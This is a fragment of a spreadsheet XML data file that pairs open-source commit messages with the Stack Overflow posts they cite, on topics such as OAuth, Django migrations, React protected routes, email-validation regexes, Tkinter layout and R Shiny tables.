One-sentence definitions of OAuth 2.0 and OpenID Connect
OAuth 2.0
is a framework where a user of a service can allow a third-party application to access his/her data hosted in the service without revealing his/her credentials (ID &amp; password) to the application.
OpenID Connect
is a framework on top of OAuth 2.0 where a third-party application can obtain a user's identity information which is managed by a service.
(Sorry, these definitions are excerpts from the
overview
page of my company)
Definitions from a viewpoint of implementors
Authentication
is a process to determine the subject (= unique identifier) of an end-user. There are many ways to determine the subject. ID &amp; password, fingerprints, iris recognition, etc.
Authorization
is a process to associate the subject with the requested permissions and the client application that requested the permissions. An access token represents the association.
See Also
Full-Scratch Implementor of OAuth and OpenID Connect Talks About Findings
Diagrams And Movies Of All The OAuth 2.0 Flows
Diagrams of All The OpenID Connect Flows
The Simplest Guide To OAuth 2.0</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The code below replicates the problem. I have an app for users to update values and I need to refresh the page after they update the values because the colors need to update, but I haven't been able to make it so pagination and ordering are preserved after the edits. GPT helped write a minimal working example but it couldn't solve the issue.&lt;/p&gt;
&lt;pre class="lang-r prettyprint-override"&gt;&lt;code&gt;library(shiny)
library(DT)
ui &amp;lt;- fluidPage(
  tags$head(
    tags$script(HTML(&amp;quot;
      // Custom handler: update the select element and row color without redrawing.
      Shiny.addCustomMessageHandler('updateDropdown', function(message) {
        var tableEl = $('#demo_table table');
        if (!tableEl.length) {
          console.warn('Table element not found');
          return;
        }
        var table = tableEl.DataTable();
        var colIndex = 2; // Category column index.
        var rowIndexes = table.rows().indexes().filter(function(idx) {
          return table.row(idx).data()[0] == message.row;
        });
        if (rowIndexes.length &amp;gt; 0) {
          var rowIndex = rowIndexes[0];
          var cellNode = table.cell(rowIndex, colIndex).node();
          $(cellNode).find('select').val(message.new_value);
          $(table.row(rowIndex).node()).css('background-color', message.new_color);
        }
      });
    &amp;quot;))
  ),
  DTOutput(&amp;quot;demo_table&amp;quot;)
)
server &amp;lt;- function(input, output, session) {
  # Create reactive data.
  data &amp;lt;- reactiveVal(data.frame(
    ID = 1:100,
    Value = sample(1:1000, 100),
    Category = sample(c(&amp;quot;A&amp;quot;, &amp;quot;B&amp;quot;, &amp;quot;C&amp;quot;), 100, replace = TRUE),
    stringsAsFactors = FALSE
  ))
  # Helper function to create dropdown HTML.
  createDropdown &amp;lt;- function(row_id, current) {
    sprintf(
      '&amp;lt;select data-row=&amp;quot;%s&amp;quot; onchange=&amp;quot;Shiny.setInputValue(\'category_change\', {row: %s, value: this.value, nonce: Math.random()})&amp;quot;&amp;gt;
         &amp;lt;option value=\&amp;quot;A\&amp;quot; %s&amp;gt;A&amp;lt;/option&amp;gt;
         &amp;lt;option value=\&amp;quot;B\&amp;quot; %s&amp;gt;B&amp;lt;/option&amp;gt;
         &amp;lt;option value=\&amp;quot;C\&amp;quot; %s&amp;gt;C&amp;lt;/option&amp;gt;
       &amp;lt;/select&amp;gt;',
      row_id, row_id,
      ifelse(current == &amp;quot;A&amp;quot;, &amp;quot;selected&amp;quot;, &amp;quot;&amp;quot;),
      ifelse(current == &amp;quot;B&amp;quot;, &amp;quot;selected&amp;quot;, &amp;quot;&amp;quot;),
      ifelse(current == &amp;quot;C&amp;quot;, &amp;quot;selected&amp;quot;, &amp;quot;&amp;quot;)
    )
  }
  # Render the table only once by isolating the reactive data.
  output$demo_table &amp;lt;- renderDT({
    df &amp;lt;- isolate(data())
    # Replace Category column with dropdown HTML.
    df$Category &amp;lt;- sapply(df$ID, function(id) {
      cat &amp;lt;- data()[data()$ID == id, &amp;quot;Category&amp;quot;]
      createDropdown(id, cat)
    })
    datatable(
      df,
      escape = FALSE,
      rownames = FALSE,
      options = list(
        pageLength = 10,
        stateSave = TRUE,
        order = list(list(1, &amp;quot;asc&amp;quot;)),
        rowCallback = JS(&amp;quot;function(row, data, index) {
          // Set hidden row id.
          $(row).attr('data-row-id', data[0]);
          // Color rows based on Value.
          var val = parseInt(data[1]);
          $(row).css('background-color', val &amp;gt; 500 ? 'lightblue' : 'white');
        }&amp;quot;)
      )
    )
  }, server = TRUE)
  proxy &amp;lt;- dataTableProxy(&amp;quot;demo_table&amp;quot;)
  # When the dropdown value changes, update the data and replace the table data.
  observeEvent(input$category_change, {
    req(input$category_change)
    info &amp;lt;- input$category_change
    df &amp;lt;- data()
    row_idx &amp;lt;- which(df$ID == info$row)
    if (length(row_idx) == 0) return()
    # Update the underlying data.
    df$Category[row_idx] &amp;lt;- info$value
    data(df)
    # Rebuild the table data with the updated dropdown HTML.
    new_df &amp;lt;- isolate(data())
    new_df$Category &amp;lt;- sapply(new_df$ID, function(id) {
      cur &amp;lt;- df[df$ID == id, &amp;quot;Category&amp;quot;]
      createDropdown(id, cur)
    })
    # Update the table without resetting pagination.
    replaceData(proxy, new_df, resetPaging = FALSE)
  })
}
shinyApp(ui, server)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I tried tweaking the JS by directly updating the DOM but that didn't work. It works if it's a single page. I have looked at other posts - the problem in &lt;a href="https://stackoverflow.com/questions/64032688/editing-values-impacting-other-columns-and-retaining-paging"&gt;here&lt;/a&gt; is similar, but they don't use JS as the option is not a dropdown, so I wasn't able to replicate the solution.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C612</t>
  </si>
  <si>
    <t>Standardize getting login_hint for create project and oauth request (
#325)
* Use RE to validate login_hint email address
http://stackoverflow.com/questions/201323/using-a-regular-expression-to-
validate-an-email-address</t>
  </si>
  <si>
    <t>The fully RFC 822 compliant regex is inefficient and obscure because of its length.  Fortunately, RFC 822 was superseded twice and the current specification for email addresses is RFC 5322.  RFC 5322 leads to a regex that can be understood if studied for a few minutes and is efficient enough for actual use.
One RFC 5322 compliant regex can be found at the top of the page at http://emailregex.com/ but uses the IP address pattern that is floating around the internet with a bug that allows 00 for any of the unsigned byte decimal values in a dot-delimited address, which is illegal.  The rest of it appears to be consistent with the RFC 5322 grammar and passes several tests using grep -Po, including cases domain names, IP addresses, bad ones, and account names with and without quotes.
Correcting the 00 bug in the IP pattern, we obtain a working and fairly fast regex:
(?:[a-z0-9!#$%&amp;'*+\x2f=?^_`\x7b-\x7d~\x2d]+(?:\.[a-z0-9!#$%&amp;'*+\x2f=?^_`\x7b-\x7d~\x2d]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9\x2d]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9\x2d]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9\x2d]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])
Here is [diagram][3] of [finite state machine][4] for above regexp which is clearer than the regexp itself: [![enter image description here][5]][5]
The more sophisticated patterns in Perl and PCRE (regex library used e.g. in PHP) can [correctly parse RFC 5322 without a hitch][6]. Python and C# can do that too, but they use a different syntax from those first two. However, if you are forced to use one of the many less powerful pattern-matching languages, then it’s best to use a real parser.
It's also important to understand that validating it per the RFC tells you absolutely nothing about whether that address actually exists at the supplied domain, or whether the person entering the address is its true owner. People sign others up to mailing lists this way all the time. Fixing that requires a fancier kind of validation that involves sending that address a message that includes a confirmation token meant to be entered on the same web page as was the address.
Confirmation tokens are the only way to know you got the address of the person entering it. This is why most mailing lists now use that mechanism to confirm sign-ups. After all, anybody can put down president@whitehouse.gov, and that will even parse as legal, but it isn't likely to be the person at the other end.
For PHP, you should not use the pattern given in [Validate an E-Mail Address with PHP, the Right Way][7] from which I quote:
There is some danger that common usage and widespread sloppy coding will establish a de facto standard for e-mail addresses that is more restrictive than the recorded formal standard.
That is no better than all the other non-RFC patterns. It isn’t even smart enough to handle even [RFC 822][8], let alone RFC 5322. [This one][6], however, is.
If you want to get fancy and pedantic, [implement a complete state engine][9]. A regular expression can only act as a rudimentary filter. The problem with regular expressions is that telling someone that their perfectly valid e-mail address is invalid (a [false negative][10]) because your regular expression can't handle it is just rude and impolite from the user's perspective. A state engine for the purpose can both validate and even correct e-mail addresses that would otherwise be considered invalid as it disassembles the e-mail address according to each RFC. This allows for a potentially more pleasing experience, like
The specified e-mail address 'myemail@address,com' is invalid. Did you mean 'myemail@address.com'?
See also [Validating Email Addresses][11], including the comments. Or [Comparing E-mail Address Validating Regular Expressions][12].
[Debuggex Demo][13]
[3]: https://regexper.com/#(%3F%3A%5Ba-z0-9!%23%24%25%26'%2B%2F%3D%3F%5E_%60%7B%7C%7D~-%5D%2B(%3F%3A%5C.%5Ba-z0-9!%23%24%25%26'%2B%2F%3D%3F%5E_%60%7B%7C%7D~-%5D%2B)%7C%22(%3F%3A%5B%5Cx01-%5Cx08%5Cx0b%5Cx0c%5Cx0e-%5Cx1f%5Cx21%5Cx23-%5Cx5b%5Cx5d-%5Cx7f%5D%7C%5C%5C%5B%5Cx01-%5Cx09%5Cx0b%5Cx0c%5Cx0e-%5Cx7f%5D)%22)%40(%3F%3A(%3F%3A%5Ba-z0-9%5D(%3F%3A%5Ba-z0-9-%5D*%5Ba-z0-9%5D)%3F%5C.)%2B%5Ba-z0-9%5D(%3F%3A%5Ba-z0-9-%5D*%5Ba-z0-9%5D)%3F%7C%5C%5B(%3F%3A(%3F%3A(2(5%5B0-5%5D%7C%5B0-4%5D%5B0-9%5D)%7C1%5B0-9%5D%5B0-9%5D%7C%5B1-9%5D%3F%5B0-9%5D))%5C.)%7B3%7D(%3F%3A(2(5%5B0-5%5D%7C%5B0-4%5D%5B0-9%5D)%7C1%5B0-9%5D%5B0-9%5D%7C%5B1-9%5D%3F%5B0-9%5D)%7C%5Ba-z0-9-%5D*%5Ba-z0-9%5D%3A(%3F%3A%5B%5Cx01-%5Cx08%5Cx0b%5Cx0c%5Cx0e-%5Cx1f%5Cx21-%5Cx5a%5Cx53-%5Cx7f%5D%7C%5C%5C%5B%5Cx01-%5Cx09%5Cx0b%5Cx0c%5Cx0e-%5Cx7f%5D)%2B)%5C%5D) [4]: https://en.wikipedia.org/wiki/Finite-state_machine [5]: https://i.sstatic.net/YI6KR.png [6]: https://stackoverflow.com/questions/201323/what-is-the-best-regular-expression-for-validating-email-addresses/1917982#1917982 [7]: http://www.linuxjournal.com/article/9585 [8]: https://datatracker.ietf.org/doc/html/rfc822 [9]: http://cubicspot.blogspot.com/2012/06/correct-way-to-validate-e-mail-address.html [10]: https://en.wikipedia.org/wiki/False_positives_and_false_negatives#False_negative_error [11]: http://worsethanfailure.com/Articles/Validating_Email_Addresses.aspx [12]: http://fightingforalostcause.net/misc/2006/compare-email-regex.php [13]: https://www.debuggex.com/r/aH_x42NflV8G-GS7</t>
  </si>
  <si>
    <t xml:space="preserve">I'm about to start building a site entirely in flash (per the client's request), using AS3, and was wondering about best practices for doing so in terms of application architecture. The site isn't too large--think homepage, persistent nav, 8 subsections or so, each with their own content but similar design between subsections. In the past, I would have used multiple swfs (say, one for the nav and one each for the subsections) and loaded them dynamically; now, though, I'm considering taking a different route and using a more object-oriented design, with lots of classes and just one swf (plus a preloader to load it).
Are there any best-practices for determining whether it's better to dynamically load smaller swfs vs building a single large swf? In AS2 I think loading many smaller swfs made more sense, but with AS3's stronger object-oriented capabilities I'm wondering if that's still the case.
I know that one argument against the single-swf design would be the added weight of loading everything upon initial siteload, but I don't think there's enough heavy content that it's of real concern here.
Any thoughts?
</t>
  </si>
  <si>
    <t>C613</t>
  </si>
  <si>
    <t>feat(routes): Configure protected routes
To ensure that only Recursers have access to the contents of the site
(outside of home and overview), I've implemented protected routes.
The change required a decent overhaul of the src/ dir but I think it
makes sense for organizational purposes. The user should be redirected
to their target page after the redirect to /login (and subsequent
authentication through OAuth2).
You can find the link used to actually get these routes working here: https://stackoverflow.com/questions/59422159/redirecting-a-user-to-the-page-they-requested-after-successful-authentication-wi/59423442#59423442</t>
  </si>
  <si>
    <t>You question cannot be answered that easily. Basically you need to remember, which path a user wanted to access, so you can redirect to that path, after the user successfully authenticated.
I've created you an example
here
. The explanation and some code from that example you can find below.
So if the user is not authenticated, we set the path to the app state. I would modify your
ProtectedRoute
to this:
import { useEffect } from 'react';
import { Redirect, Route, RouteProps, useLocation } from 'react-router';
export type ProtectedRouteProps = {
  isAuthenticated: boolean;
  authenticationPath: string;
  redirectPath: string;
  setRedirectPath: (path: string) =&gt; void;
} &amp; RouteProps;
export default function ProtectedRoute({isAuthenticated, authenticationPath, redirectPath, setRedirectPath, ...routeProps}: ProtectedRouteProps) {
  const currentLocation = useLocation();
  useEffect(() =&gt; {
    if (!isAuthenticated) {
      setRedirectPath(currentLocation.pathname);
    }
  }, [isAuthenticated, setRedirectPath, currentLocation]);
  if(isAuthenticated &amp;&amp; redirectPath === currentLocation.pathname) {
    return &lt;Route {...routeProps} /&gt;;
  } else {
    return &lt;Redirect to={{ pathname: isAuthenticated ? redirectPath : authenticationPath }} /&gt;;
  }
};
To remember the authentication and the redirection path I would create a context based on the following model:
export type Session = {
  isAuthenticated?: boolean;
  redirectPath: string;
}
export const initialSession: Session = {
  redirectPath: ''
};
According to that the context looks like this:
import { createContext, useContext, useState } from "react";
import { initialSession, Session } from "../models/session";
export const SessionContext = createContext&lt;[Session, (session: Session) =&gt; void]&gt;([initialSession, () =&gt; {}]);
export const useSessionContext = () =&gt; useContext(SessionContext);
export const SessionContextProvider: React.FC = (props) =&gt; {
  const [sessionState, setSessionState] = useState(initialSession);
  const defaultSessionContext: [Session, typeof setSessionState]  = [sessionState, setSessionState];
  return (
    &lt;SessionContext.Provider value={defaultSessionContext}&gt;
      {props.children}
    &lt;/SessionContext.Provider&gt;
  );
}
Now you need to make this context available to your app:
import React from 'react';
import ReactDOM from 'react-dom';
import App from './containers/App';
import { SessionContextProvider } from './contexts/SessionContext';
import { BrowserRouter } from 'react-router-dom';
ReactDOM.render(
  &lt;React.StrictMode&gt;
    &lt;BrowserRouter&gt;
      &lt;SessionContextProvider&gt;
        &lt;App /&gt;
      &lt;/SessionContextProvider&gt;
    &lt;/BrowserRouter&gt;
  &lt;/React.StrictMode&gt;,
  document.getElementById('root')
);
In your main container you can apply the protected routes:
import ProtectedRoute, { ProtectedRouteProps } from "../components/ProtectedRoute";
import { useSessionContext } from "../contexts/SessionContext";
import { Route, Switch } from 'react-router';
import Homepage from "./Homepage";
import Dashboard from "./Dashboard";
import Protected from "./Protected";
import Login from "./Login";
export default function App() {
  const [sessionContext, updateSessionContext] = useSessionContext();
  const setRedirectPath = (path: string) =&gt; {
    updateSessionContext({...sessionContext, redirectPath: path});
  }
  const defaultProtectedRouteProps: ProtectedRouteProps = {
    isAuthenticated: !!sessionContext.isAuthenticated,
    authenticationPath: '/login',
    redirectPath: sessionContext.redirectPath,
    setRedirectPath: setRedirectPath
  };
  return (
    &lt;div&gt;
      &lt;Switch&gt;
        &lt;Route exact={true} path='/' component={Homepage} /&gt;
        &lt;ProtectedRoute {...defaultProtectedRouteProps} path='/dashboard' component={Dashboard} /&gt;
        &lt;ProtectedRoute {...defaultProtectedRouteProps} path='/protected' component={Protected} /&gt;
        &lt;Route path='/login' component={Login} /&gt;
      &lt;/Switch&gt;
    &lt;/div&gt;
  );
};
Update March 2021
I've updated my answer above. React was throwing an error when setting the state from a foreign component. Also the previous solution didn't work when
/
path was not protected. This issues should be fixed.
Additionally I've created
an example for React Router 6
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm creating a Tkinter GUI where I want a black Text widget (message_entry) to be exactly the same width as the combined width of two horizontally placed buttons. Iâ€™m using proportions of the screen size to set widget widths, but on different screens (with different resolutions or DPI), the Text widget ends up being either wider or narrower than the two buttons combined.&lt;/p&gt;
&lt;p&gt;Important: I do not want to use expand=True or fill in my layouts, because I donâ€™t want the Text widget to stretch and fill all available spaceâ€”just match the two buttons.&lt;/p&gt;
&lt;p&gt;Here's the exact code I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import tkinter as tk
from tkinter import ttk
root = tk.Tk(className=&amp;quot;Chat&amp;quot;)
root.title(&amp;quot;Chat&amp;quot;)
# Maximize the window
root.wm_state('zoomed')
# Get the screen width and height
screen_width = root.winfo_screenwidth()
screen_height = root.winfo_screenheight()
def proportion_height(p):
    return int(screen_height * p)
def proportion_box_width(p):
    box_width = int(screen_width * p)
    print(&amp;quot;Box width is &amp;quot;, box_width)
    box_width = int(box_width / 2)
    print(&amp;quot;Box width after devide is &amp;quot;, box_width)
    return box_width
# Proportional calculations
def proportion_width(p):
    return int(screen_width * p)
frame1 = tk.Frame(root, bg='white')
frame1.pack(side='bottom', padx=(proportion_width(0.22),0), pady=(proportion_height(0.1), 1), anchor='w')
frame2 = tk.Frame(root, bg='white')
frame2.pack(
            before=frame1,
            side='bottom',
            padx=(proportion_width(0.22),0),
            pady=(proportion_height(0), 5),
            anchor='w'
        )
# Frame to contain message_entry and buttons
frame_for_widgets = tk.Frame(root, bg='white')
frame_for_widgets.pack(
            padx=(proportion_width(0.22),0),
            anchor='w',
            before=frame2,
            pady=(0, proportion_height(0.02)),
            side='bottom',
        )
style = ttk.Style()
style.configure(&amp;quot;def2.TButton&amp;quot;, font=('Helvetica', 14,), background='white', fg='white', highlightthickness=1, highlightbackground=&amp;quot;gray&amp;quot;, borderwidth=1)
chat_with_pdf_button = ttk.Button(frame1, width=proportion_box_width(0.04), text=&amp;quot;Chat with PDF&amp;quot;, style=&amp;quot;def2.TButton&amp;quot;,)
chat_with_pdf_button.pack(side='left', expand=False, ipady=proportion_height(0.01))
# Create a button to trigger the summarization process
summarize_button = ttk.Button(frame1, width=proportion_box_width(0.04), text=&amp;quot;Chat with a YouTube video&amp;quot;, style=&amp;quot;def2.TButton&amp;quot;)
summarize_button.pack(side='right', expand=False, padx=(proportion_height(0.01), 0), ipady=proportion_height(0.01))
letter_button = ttk.Button(frame2, width=proportion_box_width(0.04), text=&amp;quot;Write a letter&amp;quot;, style=&amp;quot;def2.TButton&amp;quot;)
letter_button.pack(side='left',expand=False, ipady=proportion_height(0.01))
blog_button = ttk.Button(frame2, width=proportion_box_width(0.04), text=&amp;quot;Chat with a Blog Post&amp;quot;,  style=&amp;quot;def2.TButton&amp;quot;)
blog_button.pack(side='right',expand=False, padx=(proportion_height(0.01), 0), ipady=proportion_height(0.01))
message_entry = tk.Text(
    frame_for_widgets,
    width=proportion_width(0.04),
    bg='black',
    insertbackground='black',
    fg='black',
    borderwidth=0,
    # Removing fixed width and height, so it expands with the frame
    height=proportion_width(0.000001),
      # Set a fixed height if needed
    spacing1=proportion_height(0.02),  # Adjust spacing1 proportionally
    spacing3=proportion_height(0.02),  # Adjust spacing3 proportionally
    font=('Helvetica', 14)
)
# Pack message_entry into frame2
message_entry.pack(side='left', expand=False)
# Send button
send_button = ttk.Button(frame_for_widgets)
send_button.pack(side='left', 
        expand=False,                       
        padx=(proportion_width(0.001),0),
        pady=(proportion_height(0.02), proportion_height(0.02)),)
send_button.pack_configure(expand=False)
style = ttk.Style()
style.configure(&amp;quot;TMenubutton&amp;quot;, background=&amp;quot;white&amp;quot;, borderwidth=0, font=('Helvetica', 14),)  # Set background color, reduce border thickness, set font, and set text color
menu_button = ttk.Menubutton(frame_for_widgets, text=&amp;quot;Select&amp;quot;, direction='above',)  # Set &amp;quot;Option 1&amp;quot; as the initial text
menu_button.pack(side=tk.LEFT, pady=(proportion_height(0.02), proportion_height(0.02)), expand=False)
root.mainloop()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/7IOVAmeK.png" rel="nofollow noreferrer"&gt;Here's how it looks on my screen&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My Goal:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Make message_entry have exactly the same width as the sum of the widths of chat_with_pdf_button and summarize_button, regardless of the userâ€™s screen resolution or DPI.&lt;/p&gt;
&lt;p&gt;Avoid using expand=True or fill because I donâ€™t want the widget to fill the entire window, just to match the button widths.&lt;/p&gt;
&lt;p&gt;Iâ€™d really appreciate any help on how to get consistent widths across different screen resolutions without using expand or fill.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C614</t>
  </si>
  <si>
    <t>#1555 - encode passwords as utf8
Encode strings that are passed to usermod and smbpasswd to fix #1555
and avoid 'dead' usernames without a password. see:
http://stackoverflow.com/a/3040117</t>
  </si>
  <si>
    <t xml:space="preserve">I may have solved this by changing: pipe.communicate( data ) to pipe.communicate( data.encode('utf8') )
Though I stand to be corrected!
</t>
  </si>
  <si>
    <t xml:space="preserve">Is the Northwind Starter Kit from Codeplex a good starting point to learn more about how to best architect an ASP.NET application?
Is there something similar for the AdventureWorks database examples?
</t>
  </si>
  <si>
    <t>C615</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As Apple introduce the &lt;code&gt;move(fromOffsets:toOffset:)&lt;/code&gt; method in their &lt;a href="https://developer.apple.com/documentation/swift/mutablecollection/move(fromoffsets:tooffset:)" rel="nofollow noreferrer"&gt;document&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I opened a new XcodePlayground and have this variable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var letters = Array(&amp;quot;ABcDefgHIJKlmNO&amp;quot;)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the &lt;code&gt;move(fromOffsets:toOffset:)&lt;/code&gt; seems unavailable to the &lt;code&gt;letters&lt;/code&gt; variable.&lt;/p&gt;
&lt;p&gt;I thought it might be a type inference issue, so I declared another variable.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var test: [Int] = [1,2,3,4,5] 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But still unable to call the &lt;code&gt;move&lt;/code&gt; method, have I done something wrong?&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/Yumvs9x7.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/Yumvs9x7.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C616</t>
  </si>
  <si>
    <t>Move Country and Language into indigo_api
See https://stackoverflow.com/questions/30601107/move-models-between-django-1-8-apps-with-required-foreignkey-references</t>
  </si>
  <si>
    <t>Migrating a model between apps.
The short answer is,
don't do it!!
But that answer rarely works in the real world of living projects and production databases. Therefore, I have created a
sample GitHub repo
to demonstrate this rather complicated process.
I am using MySQL.
(No, those aren't my real credentials).
The Problem
The example I'm using is a factory project with a
cars
app that initially has a
Car
model and a
Tires
model.
factory
  |_ cars
    |_ Car
    |_ Tires
The
Car
model has a ForeignKey relationship with
Tires
. (As in, you specify the tires via the car model).
However, we soon realize that
Tires
is going to be a large model with its own views, etc., and therefore we want it in its own app. The desired structure is therefore:
factory
  |_ cars
    |_ Car
  |_ tires
    |_ Tires
And we need to keep the ForeignKey relationship between
Car
and
Tires
because too much depends on preserving the data.
The Solution
Step 1.
Setup initial app with bad design.
Browse through the code of
step 1.
Step 2.
Create an admin interface and add a bunch of data containing ForeignKey relationships.
View
step 2.
Step 3.
Decide to move the
Tires
model to its own app. Meticulously cut and paste code into the new tires app. Make sure you update the
Car
model to point to the new
tires.Tires
model.
Then run
./manage.py makemigrations
and backup the database somewhere (just in case this fails horribly).
Finally, run
./manage.py migrate
and see the error message of doom,
django.db.utils.IntegrityError: (1217, 'Cannot delete or update a parent row: a foreign key constraint fails')
View code and migrations so far in
step 3.
Step 4.
The tricky part. The auto-generated migration fails to see that you've merely copied a model to a different app. So, we have to do some things to remedy this.
You can follow along and view the final migrations with comments in
step 4.
I did test this to verify it works.
First, we are going to work on
cars
. You have to make a new, empty migration. This migration actually needs to run before the most recently created migration (the one that failed to execute). Therefore, I renumbered the migration I created and changed the dependencies to run my custom migration first and then the last auto-generated migration for the
cars
app.
You can create an empty migration with:
./manage.py makemigrations --empty cars
Step 4.a.
Make custom
old_app
migration.
In this first custom migration, I'm only going to perform a "database_operations" migration. Django gives you the option to split "state" and "database" operations. You can see how this is done by viewing the
code here
.
My goal in this first step is to rename the database tables from
oldapp_model
to
newapp_model
without messing with Django's state. You have to figure out what Django would have named your database table based on the app name and model name.
Now you are ready to modify the initial
tires
migration.
Step 4.b.
Modify
new_app
initial migration
The operations are fine, but we only want to modify the "state" and not the database. Why? Because we are keeping the database tables from the
cars
app. Also, you need to make sure that the previously made custom migration is a dependency of this migration. See the tires
migration file
.
So, now we have renamed
cars.Tires
to
tires.Tires
in the database, and changed the Django state to recognize the
tires.Tires
table.
Step 4.c.
Modify
old_app
last auto-generated migration.
Going
back
to cars, we need to modify that last auto-generated migration. It should require our first custom cars migration, and the initial tires migration (that we just modified).
Here we should leave the
AlterField
operations because the
Car
model
is pointing
to a different model (even though it has the same data). However, we need to remove the lines of migration concerning
DeleteModel
because the
cars.Tires
model no longer exists. It has fully converted into
tires.Tires
. View
this migration
.
Step 4.d.
Clean up stale model in
old_app
.
Last but not least, you need to make a final custom migration in the cars app. Here, we will do a "state" operation only to delete the
cars.Tires
model. It is state-only because the database table for
cars.Tires
has already been renamed. This
last migration
cleans up the remaining Django state.</t>
  </si>
  <si>
    <t xml:space="preserve">Are there other example projects like the Northwind Starters kit around that show you 'best practices' (layers, unit tests, mocking data, o/r mapping tools, ...) in architecture of ASP.NET development?
Or links to good and clear resources or documentation? (MSDN is a good reference but no good as tutorial)
are there example projects around addressing Visual Studio2008 and/or the AdventureWorks database?
thx, Lieven Cardoen
</t>
  </si>
  <si>
    <t>C617</t>
  </si>
  <si>
    <t>Auto-create Django super user in DB
Introduce a Django migration to create the Django super user from
environment variable values if its not already defined in the DB.
This idea and code is take from the following answer on Stack Overflow:
    https://stackoverflow.com/a/53555252/8243700</t>
  </si>
  <si>
    <t>As of Django 3.0 you can use default
createsuperuser --noinput
command and set all required fields (including password) as environment variables
DJANGO_SUPERUSER_PASSWORD
,
DJANGO_SUPERUSER_USERNAME
,
DJANGO_SUPERUSER_EMAIL
for example.
--noinput
flag is required.
This comes from the original docs:
https://docs.djangoproject.com/en/3.0/ref/django-admin/#django-admin-createsuperuser
It is the most convenient way to add
createsuperuser
to scripts and pipelines.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This scrolling works on Ios But it Doesn't work on Android Devices.&lt;/p&gt;
&lt;p&gt;I Set the SafeArea Height and content Container for scrollview and also set height for image and am using nativewind here. the TouchableOpaciity is Disappearing in the bottom but the scrolling is not working here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import React from &amp;quot;react&amp;quot;;
import { SafeAreaView } from &amp;quot;react-native-safe-area-context&amp;quot;;
import { Image, ScrollView, Text, TouchableOpacity, View } from &amp;quot;react-native&amp;quot;;
import icons from &amp;quot;@/constants/icons&amp;quot;;
import images from &amp;quot;@/constants/images&amp;quot;;
const Auth = () =&amp;gt; {
  const handleLogin = async () =&amp;gt; {};
  return (
    &amp;lt;SafeAreaView className=&amp;quot;bg-white h-full&amp;quot;&amp;gt;
      &amp;lt;ScrollView
        contentContainerStyle={{
          height: &amp;quot;100%&amp;quot;,
        }}
      &amp;gt;
        &amp;lt;Image
          source={images.onboarding}
          className=&amp;quot;w-full h-4/6&amp;quot;
          resizeMode=&amp;quot;contain&amp;quot;
        /&amp;gt;
        &amp;lt;View className=&amp;quot;px-10&amp;quot;&amp;gt;
          &amp;lt;Text className=&amp;quot;text-base text-center uppercase font-rubik text-black-200&amp;quot;&amp;gt;
            Welcome To Real Scout
          &amp;lt;/Text&amp;gt;
          &amp;lt;Text className=&amp;quot;text-3xl font-rubik-bold text-black-300 text-center mt-2&amp;quot;&amp;gt;
            Let's Get You Closer To {&amp;quot;\n&amp;quot;}
            &amp;lt;Text className=&amp;quot;text-primary-300&amp;quot;&amp;gt;Your Ideal Home&amp;lt;/Text&amp;gt;
          &amp;lt;/Text&amp;gt;
          &amp;lt;Text className=&amp;quot;text-lg font-rubik text-black-200 text-center mt-12&amp;quot;&amp;gt;
            Login to Real Scout with Google
          &amp;lt;/Text&amp;gt;
          &amp;lt;TouchableOpacity
            onPress={handleLogin}
            className=&amp;quot;bg-white shadow-md shadow-zinc-300 rounded-full w-full py-4 mt-5&amp;quot;
          &amp;gt;
            &amp;lt;View className=&amp;quot;flex flex-row items-center justify-center&amp;quot;&amp;gt;
              &amp;lt;Image
                source={icons.google}
                className=&amp;quot;w-5 h-5&amp;quot;
                resizeMode=&amp;quot;contain&amp;quot;
              /&amp;gt;
              &amp;lt;Text className=&amp;quot;text-lg font-rubik-medium text-black-300 ml-2&amp;quot;&amp;gt;
                Continue with Google
              &amp;lt;/Text&amp;gt;
            &amp;lt;/View&amp;gt;
          &amp;lt;/TouchableOpacity&amp;gt;
        &amp;lt;/View&amp;gt;
      &amp;lt;/ScrollView&amp;gt;
    &amp;lt;/SafeAreaView&amp;gt;
  );
};
export default Auth;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C618</t>
  </si>
  <si>
    <t>Updated pipeline example to include externalized auth;
See http://stackoverflow.com/questions/20504515/associate-only-authentication-with-python-social-authentication-and-django</t>
  </si>
  <si>
    <t>That works, that's the correct approach that goes with the spirit that goes with the application, my docs aren't entirely correct, the pipeline for single association listed there assumes that the user is logged in, which is not the your scenario, but that's not detailed in the doc.</t>
  </si>
  <si>
    <t xml:space="preserve">I decided to put some effort in building a web browser from scratch. What are the common functions, architectures, and features of modern web browsers that I should know before getting started?
Any recommendations are highly appreciated!
</t>
  </si>
  <si>
    <t>C619</t>
  </si>
  <si>
